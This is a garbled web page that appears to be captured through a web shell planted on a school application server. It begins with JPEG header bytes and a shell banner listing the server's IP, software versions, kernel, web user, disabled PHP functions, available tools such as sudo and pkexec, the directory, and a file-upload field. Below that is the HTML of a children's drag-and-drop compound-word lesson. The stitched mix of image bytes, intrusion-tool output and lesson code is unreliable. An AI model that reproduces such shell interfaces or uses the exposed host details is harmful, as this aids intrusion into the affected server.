????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.36 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old4/Html/LevelD/Category1/ |
Upload File : |
<!doctype html>
<html>
<head>
<title>Thinking skills</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<script>
function page_preLoad()
{
shared_setDeviceTypeLevelCategoryLastLesson(Level.D, Category.No1);
shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.D, Category.No1, 36), true, true);
shared_setFooterTable('id_tblFooter', true, true, false, true, true);
var ids_boxes = ['id_td_box_windMill', 'id_td_box_footBall', 'id_td_box_waterFall', 'id_td_box_handCuff'];
var ids_headings = ['id_td_heading1', 'id_td_heading2'];
var ids_options = ['id_span_water', 'id_span_wind', 'id_span_hand', 'id_span_foot'];
var ids_All = ids_boxes.concat(ids_headings);
shared_adjust_fontSize_for_ids_all_devices(ids_options, 80);
shared_adjust_fontSize_for_ids_all_devices(ids_All, 80);
shared_init_dropBox_tds_withOUT_drag_here(ids_boxes);
shared_init_dropping_spans(ids_options);
}
function page_onLoad()
{
}
function btnHome_click()
{
shared_btnHomeCategories_click('LevelD');
}
function btnPrevious_click()
{
window.location = "LevelDCat1Lesson35.html";
}
function btnNext_click()
{
window.location = "LevelDCat1Lesson37.html";
}
function DragDrop(id_dropBox, ids_array)
{
if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
{
shared_setTextAndBackgroundColorToGreenAndIsMovedTrueAndReplaceText(shared_currentDropingId, id_dropBox);
isAllInfosMovedShowClapsAnimation();
shared_set_currentDropingId_draggbleToFalse();
}
else
{
shared_resetCurrentDroppingPosition(id_dropBox);
}
}
function isAllInfosMovedShowClapsAnimation()
{
var ids_boxes = ['id_td_box_windMill', 'id_td_box_footBall', 'id_td_box_waterFall', 'id_td_box_handCuff'];
shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
}
</script>
</head>
<body onload="page_onLoad()">
<div id="shared_id_div_claps_image">
</div>
<table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
<tr height="8%">
<td>
<div id="id_tblHeader"></div>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
<tr>
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="10%">
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
<tr>
<td id="id_td_heading1" class="shared_style_red_24px_bold_padding_left_2_percent" style="border-bottom: none">
<u>Thinking skills:<br>Match the following words to make new words:</u>
</td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="100%">
<td>
<table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
<tr height="10%">
<td style="border-bottom:none">
<table id="id_tblOptionsSet2" border="0" width="100%" height="100%" cellspacing="0" cellpadding="0">
<tr height="6%">
<td id="id_td_heading2" width="*" class="shared_style_blue_24px_bold_padding_left_2_percent">Options:</td>
<td id="id_td_water" width="20%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_span_water" class="shared_style_red_24px_bold">Water</span></td>
<td id="id_td_wind" width="20%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_span_wind" class="shared_style_red_24px_bold">Wind</span></td>
<td id="id_td_hand" width="20%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_span_hand" class="shared_style_red_24px_bold">Hand</span></td>
<td id="id_td_foot" width="20%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"><span id="id_span_foot" class="shared_style_red_24px_bold">Foot</span></td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr id="id_tr_windMill"
ondragover="shared_highlight('id_td_box_windMill'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_td_box_windMill')"
ondrop="DragDrop('id_td_box_windMill', ['id_span_wind'])">
<td width = "60%">
<table width="100%" height="50%" border="0" cellspacing="2%" cellpadding="0">
<tr>
<td width = "50%"> </td>
<td width="*" id="id_td_box_windMill" class="shared_style_red_24px" align="center">mill _____</td>
</tr>
</table>
</td>
<td width = "*">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="style_Td" width="30%" style="border-bottom: none">
<img id="id_imgWindMill" width="35%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson36/windMill.png">
</td>
</tr>
</table>
</td>
</tr>
<tr id="id_tr_footBall"
ondragover="shared_highlight('id_td_box_footBall'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_td_box_footBall')"
ondrop="DragDrop('id_td_box_footBall', ['id_span_foot'])">
<td width = "60%">
<table width="100%" height="50%" border="0" cellspacing="2%" cellpadding="0">
<tr>
<td width = "50%"> </td>
<td width="*" id="id_td_box_footBall" class="shared_style_red_24px" align="center">ball _____</td>
</tr>
</table>
</td>
<td width = "*">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="style_Td" width="30%" style="border-bottom: none">
<img id="id_imgFootBall" width="35%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson36/footBall.png">
</td>
</tr>
</table>
</td>
</tr>
<tr id="id_tr_waterFall"
ondragover="shared_highlight('id_td_box_waterFall'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_td_box_waterFall')"
ondrop="DragDrop('id_td_box_waterFall', ['id_span_water'])">
<td width = "60%">
<table width="100%" height="50%" border="0" cellspacing="2%" cellpadding="0">
<tr>
<td width = "50%"> </td>
<td width="*" id="id_td_box_waterFall" class="shared_style_red_24px" align="center">fall _____</td>
</tr>
</table>
</td>
<td width = "*">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="style_Td" width="30%" style="border-bottom: none">
<img id="id_imgWaterFall" width="35%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson36/waterFall.png">
</td>
</tr>
</table>
</td>
</tr>
<tr id="id_tr_handCuff"
ondragover="shared_highlight('id_td_box_handCuff'); shared_allowDrop_web(event)"
ondragleave="shared_un_highlight('id_td_box_handCuff')"
ondrop="DragDrop('id_td_box_handCuff', ['id_span_hand'])">
<td width = "60%">
<table width="100%" height="50%" border="0" cellspacing="2%" cellpadding="0">
<tr>
<td width = "50%"> </td>
<td width="*" id="id_td_box_handCuff" class="shared_style_red_24px" align="center">cuff _____</td>
</tr>
</table>
</td>
<td width = "*">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="30%" style="border-bottom: none">
<img id="id_imgHandCuff" width="35%" height="auto" src="../../../img/LevelD/Category1/LevelDCat1Lesson36/handCuff.png">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="8%">
<td>
<div id="id_tblFooter"></div>
</td>
</tr>
</table>
<script>
page_preLoad();
new webkit_draggable('id_span_wind', {handle : 'id_td_wind', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_foot', {handle : 'id_td_foot', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_water', {handle : 'id_td_water', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
new webkit_draggable('id_span_hand', {handle : 'id_td_hand', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
webkit_drop.add('id_tr_windMill', {onOver : function(){shared_highlight('id_td_box_windMill')}, onOut : function(){shared_un_highlight('id_td_box_windMill')}, onDrop : function(){DragDrop('id_td_box_windMill', ['id_span_wind'])}});
webkit_drop.add('id_tr_footBall', {onOver : function(){shared_highlight('id_td_box_footBall')}, onOut : function(){shared_un_highlight('id_td_box_footBall')}, onDrop : function(){DragDrop('id_td_box_footBall', ['id_span_foot'])}});
webkit_drop.add('id_tr_waterFall', {onOver : function(){shared_highlight('id_td_box_waterFall')}, onOut : function(){shared_un_highlight('id_td_box_waterFall')}, onDrop : function(){DragDrop('id_td_box_waterFall', ['id_span_water'])}});
webkit_drop.add('id_tr_handCuff', {onOver : function(){shared_highlight('id_td_box_handCuff')}, onOut : function(){shared_un_highlight('id_td_box_handCuff')}, onDrop : function(){DragDrop('id_td_box_handCuff', ['id_span_hand'])}});
</script>
</body>
</html>